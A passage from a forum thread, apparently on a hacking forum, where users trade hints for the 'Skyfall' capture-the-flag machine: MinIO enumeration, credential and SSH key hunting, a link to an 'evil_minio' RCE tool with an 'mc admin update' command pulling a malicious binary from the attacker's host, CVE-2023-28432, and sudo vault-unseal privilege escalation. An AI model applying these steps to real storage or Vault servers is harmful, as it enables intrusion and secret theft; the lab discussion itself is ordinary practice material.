Posts: 11
Threads: 0
Joined: Jan 2024
(Feb 03, 2024, 10:40 PM)Art10n Wrote: Not AWS , MinIO
http://prd23-s3-backend.skyfall.htb/mini...cs/cluster
# HELP minio_audit_failed_messages Total number of messages that failed to send since start
# TYPE minio_audit_failed_messages counter
minio_audit_failed_messages{server="minio-node1:9000",target_id="sys_console_0"} 0
minio_audit_failed_messages{server="minio-node2:9000",target_id="sys_console_0"} 0
# HELP minio_audit_target_queue_length Number of unsent messages in queue for target
# TYPE minio_audit_target_queue_length gauge
minio_audit_target_queue_length{server="minio-node1:9000",target_id="sys_console_0"} 0
minio_audit_target_queue_length{server="minio-node2:9000",target_id="sys_console_0"} 0
# HELP minio_audit_total_messages Total number of messages sent since start
# TYPE minio_audit_total_messages counter
minio_audit_total_messages{server="minio-node1:9000",target_id="sys_console_0"} 1
minio_audit_total_messages{server="minio-node2:9000",target_id="sys_console_0"} 0
# HELP minio_bucket_objects_size_distribution Distribution of object sizes in the bucket, includes label for the bucket name
# TYPE minio_bucket_objects_size_distribution gauge
minio_bucket_objects_size_distribution{bucket="askyy",range="BETWEEN_1024_B_AND_1_MB",server="minio-node2:9000"} 1
Please share how you discovered the subdomain http://prd23-s3-backend.skyfall.htb/
I have tried multiple wordlists but cannot find it.
Posts: 148
Threads: 2
Joined: Oct 2023
(Feb 04, 2024, 12:08 AM)berlik Wrote: (Feb 04, 2024, 12:01 AM)Shalabi Wrote: (Feb 03, 2024, 11:59 PM)berlik Wrote: How did you set up the mc client? can you show file ~/.mc/config.json?
use mc alias set myminio http://... rootuser rootpassword
Tnx!!!
just make sure you don't mess it up with your mc (midnight commander) if you have, be careful of the paths...
though, didn't found anything useful... even if versioning is enabled for one of the users, you can go back few versions..
Posts: 148
Threads: 2
Joined: Oct 2023
Feb 04, 2024, 01:13 AM
(This post was last modified: Feb 04, 2024, 01:13 AM by peRd1.)
(Feb 04, 2024, 01:10 AM)rat Wrote: (Feb 04, 2024, 01:06 AM)camiyi3472 Wrote: damn i found the ssh key but can't login it is asking for the pass
cause its old and new ones dont have the authorized users file populated
which much explains it why 
Posts: 13
Threads: 0
Joined: Feb 2024
Feb 04, 2024, 02:24 AM
(This post was last modified: Feb 04, 2024, 03:09 AM by gtastav.)
I found more stuff in home_backup.tar.gz:
VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb"
PM for tokens.
Also you must add that new vhost to /etc/hosts
Posts: 55
Threads: 2
Joined: Jul 2023
Posts: 27
Threads: 0
Joined: Nov 2023
(Feb 04, 2024, 04:01 AM)camiyi3472 Wrote: (Feb 04, 2024, 03:58 AM)DataNinja Wrote: some hint to root?
Dude, any nudge on initial access?
mc admin update command is not working for me , it is giving me error, don't know if i am in the right path
Yeah I'm not sure if the evilminio RCE path is the way. I'm getting this error when trying to update minio:
mc admin update myminio http://10.10.X.X:18080/minio.RELEASE.2023-03-22T06-36-24Z.sha256
You are about to upgrade *MinIO Server*, please confirm [y/N]: y
mc: <ERROR> Unable to update the server. The specified method is not allowed against this resource.
I was using this: https://github.com/AbelChe/evil_minio
Anyone have any ideas for getting foothold? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 13
Threads: 0
Joined: Feb 2024
Feb 04, 2024, 04:43 AM
(This post was last modified: Feb 04, 2024, 04:50 AM by gtastav.)
(Feb 04, 2024, 04:01 AM)camiyi3472 Wrote: (Feb 04, 2024, 03:58 AM)DataNinja Wrote: some hint to root?
Dude, any nudge on initial access?
mc admin update command is not working for me , it is giving me error, don't know if i am in the right path
nudge : export VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb"
hint:There is more to it, you need a token and its in a file inside askyy and it has mutliple versions(to revert versions use mc undo)
askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v
[+] Reading: /etc/vault-unseal.yaml
[-] Security Risk!
[-] Master token found in config: ****************************
[>] Enable 'debug' mode for details
[+] Found Vault node: http://prd23-vault-internal.skyfall.htb
[>] Check interval: 5s
[>] Max checks: 5
[>] Checking seal status
[+] Vault sealed: false
I know you can add at the end of the command another -c.
I just don't know how the file should be looked like, I tried so many combinations and still nothing.
askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -vc test.yaml
[+] Reading: test.yaml
[>] Check interval: 5s
[>] Max checks: 5
[!] No tokens found in config
Posts: 5
Threads: 0
Joined: Feb 2024
can anyone shed some light on how CVE-2023-28432 was exploited? i haven't been able to find the vulnerable endpoint
Posts: 55
Threads: 2
Joined: Jul 2023
Posts: 62
Threads: 1
Joined: Jul 2023
(Feb 04, 2024, 05:12 AM)Junkman2531 Wrote: (Feb 04, 2024, 05:07 AM)DataNinja Wrote: the rooted is easy
any hint for root?
this is complete guesswork as there is literally no documentation on vault-unseal...
It is an open source tool, so not total guesswork: https://github.com/lrstanley/vault-unseal
|
